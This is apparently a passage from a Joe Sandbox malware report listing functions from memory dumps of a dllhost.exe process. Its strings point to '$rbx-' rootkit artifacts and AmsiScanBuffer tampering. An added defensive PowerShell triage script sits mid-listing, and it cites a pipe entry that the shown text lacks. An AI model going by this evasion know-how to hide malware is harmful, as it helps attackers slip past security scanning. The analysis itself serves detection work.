                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction ID: 4144f1c8154a2cd595ff6df125308f8b7bd36a0b93b69aadaefae46ac8bfbf79
                                            • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction Fuzzy Hash: C431E631312B44C1EF119B069888BA5F3A5FB44BE1F590625ED1D8B7B2EFB8C664C324
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction ID: 9731a4ea26dd46b7a2b3c470ac8a557678bb1ecda8c450b4ea16737dd08f0b2e
                                            • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction Fuzzy Hash: BF116D31310B5086E7908F52E858719E7A4F798BE4F444225EA5E87BE5DFB8CA24C744
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                             • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Delete$CloseEnumOpen
                                            • String ID: SOFTWARE\$rbx-config
                                            • API String ID: 3013565938-3990243012
                                            • Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                            • Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
                                            • Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
                                            • Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19
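The two function entries above that carry `$rbx-` strings describe host artifacts a responder can check for directly: one pairs CreateFile/ReadFile/WriteFile with the named pipe `\\.\pipe\$rbx-childproc` (parent/child IPC), the other pairs RegOpenKey/RegEnumKey/RegDeleteKey/RegCloseKey with `SOFTWARE\$rbx-config`. The following triage script is an added example written for this page; it is not part of the Joe Sandbox report and not code from the sample. It assumes the key may live under either HKLM or HKCU (the listing shows only the `SOFTWARE\` prefix, not the hive) and uses the report's own observation that the hooked code ran inside dllhost.exe (the `_dllhost.jbxd` snapshot names) to flag surrogate processes with a non-standard command line.

```powershell
# Added triage check for the artifacts named in the function listing above.
# Not from the Joe Sandbox report or the sample. Run in an elevated PowerShell
# on the suspect host. Assumption: hive of 'SOFTWARE\$rbx-config' is unknown,
# so both HKLM and HKCU are tested.

$findings = @()

# 1. Named pipe. The listing pairs CreateFile/Read/Write with this path, so a live
#    pipe instance means the parent/child channel is currently open.
$pipeName = '$rbx-childproc'
foreach ($p in [System.IO.Directory]::GetFiles('\\.\pipe\')) {
    if ([System.IO.Path]::GetFileName($p) -eq $pipeName) {
        $findings += "named pipe present: $p"
    }
}

# 2. Registry key. The listing pairs Open/Enum/Delete/Close with 'SOFTWARE\$rbx-config';
#    -LiteralPath keeps PowerShell from treating '$' or wildcards in the name specially.
foreach ($hive in 'HKLM:', 'HKCU:') {
    $key = Join-Path $hive 'SOFTWARE\$rbx-config'
    if (Test-Path -LiteralPath $key) {
        $values = Get-ItemProperty -LiteralPath $key |
                  Select-Object -Property * -ExcludeProperty PS*
        $findings += "registry key present: $key`n$($values | Out-String)"
    }
}

# 3. dllhost.exe hosts. The report's snapshots come from a dllhost.exe process; a
#    legitimate COM surrogate is started as 'dllhost.exe /Processid:{GUID}', so any
#    instance with a different command line deserves a memory dump.
Get-CimInstance Win32_Process -Filter "Name='dllhost.exe'" | ForEach-Object {
    if ($_.CommandLine -notmatch '/Processid:\{') {
        $findings += "dllhost.exe PID $($_.ProcessId) with unusual command line: $($_.CommandLine)"
    }
}

if ($findings.Count -eq 0) { 'no $rbx- artifacts found' } else { $findings }
```

A clean result only says the pipe is not open and the key is absent at that moment; the registry routine in the listing also deletes the key, so check the hooked dllhost.exe memory dump rather than trusting the registry alone.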
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction ID: a91be25266190429ed207ecc44afeedc7aa0bcdc5925fb9ec615f25929a1a9a4
                                            • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction Fuzzy Hash: A6D18A76214B8881EB709B1AE49835AF7A4F38CB88F540516EACD477B6DF7CC661DB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction ID: 70d9181fb4961d94369b1eeb1472e4a009a25c088f37b852dc06778e98ae3e85
                                            • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction Fuzzy Hash: 2AD19D36209B8885DB70DB0AE49875AF7A1F3C8B89F140116EACD4777ADF78C661CB10
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Free$CurrentThread
                                            • String ID:
                                            • API String ID: 564911740-0
                                            • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction ID: 7516ff49dcbe5eaafc1dd9bfc23c12edfd91ae01ca74b1af3b9263db5d7cdc34
                                            • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction Fuzzy Hash: E351C231221F4595FB15EF24EC586A8E3A1BB08754F84481AE92D067B7EFB8D738D380
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Free$CurrentThread
                                            • String ID:
                                            • API String ID: 564911740-0
                                            • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction ID: 17c99371b402209796be629e99f2e906a23f8cd76dafebe42ba755844e62658b
                                            • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction Fuzzy Hash: 51510B31201F8995EF19DF28E858A98E3A1FB04746F840816A52D067B7EFF5D778C3A0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: $rbx-
                                            • API String ID: 756756679-3661604363
                                            • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction ID: 2b20bd72820d89394c7d9bc9375efcefa42d1c3e4bf74fc674dc2e40480fc4f7
                                            • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction Fuzzy Hash: 70319E32711B5A82FB54DF26A548669E3A0BB5DF84F0840208F4807BB6EFB4E6B1D700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID: $rbx-
                                            • API String ID: 756756679-3661604363
                                            • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction ID: badcf454c96f7c7205424c66f360620224cafc0cbe2cfda4e1b6a66d9694948d
                                            • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                            • Instruction Fuzzy Hash: 2F31A332701B5987EB15DF16E549B69E3A0FB48B85F0840208F4907B7AEFB4C6B5C750
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ErrorLast$Value$FreeHeap
                                            • String ID:
                                            • API String ID: 365477584-0
                                            • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction ID: 71225ee2ce45be8f7ed297cd954a08d16c930abf1de484e2ec0ca2ff4853779e
                                            • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction Fuzzy Hash: 0011862132074042FB546731691D36EE251AB8C790F985625E86E5B3FBDFB8D771E300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ErrorLast$Value$FreeHeap
                                            • String ID:
                                            • API String ID: 365477584-0
                                            • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction ID: 20473cc48c2304b5e37bb2cbd89b1eb95322a10b6f4095b4819abbfe2931133a
                                            • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                            • Instruction Fuzzy Hash: 8311C62130434242FF586B31681DB7ED241AB84791F546634E86A567F7DFB8C7A1C330
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProcSleep
                                            • String ID: AmsiScanBuffer$amsi.dll
                                            • API String ID: 188063004-3248079830
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProcSleep
                                            • String ID: AmsiScanBuffer$amsi.dll
                                            • API String ID: 188063004-3248079830
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction ID: 9d983320266970397c460f8245dc8e0c3819595df01f05bdee580baea82a4540
                                            • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction Fuzzy Hash: 0C51C331224B0187F764DF26E848A5AF3A1F38CB90F54411DDE4A43766EFB9DA25DB40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction ID: cd42e5dcbb5b277dda067fa6551f5aa621a8243b6c0a8ac1a1d97e3d0fa0d604
                                            • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction Fuzzy Hash: 4E51C63531474187E728CF26E448A6AF3B1F788B85F504119DE4A43776DFB9CA65CB40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction ID: e33cfaf7e6e0bf29b7c037277f82f90fa3c648b7d4cdd2cab6e43731885fbe31
                                            • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction Fuzzy Hash: 7F619376529B8486F7609B15E45831EF7A5F388744F500116FA8D87BBADFBCC660DB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                             • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction ID: 818c03b988d785ac1a56ee78f05939167607d58ed2b81554ba7fde1134482cf2
                                            • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction Fuzzy Hash: 5F619936529B84C6E7608B19E45871AF7A1F388745F101126FA8D47BB9EFBDCA60CF10
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                             • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmp
                                             • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
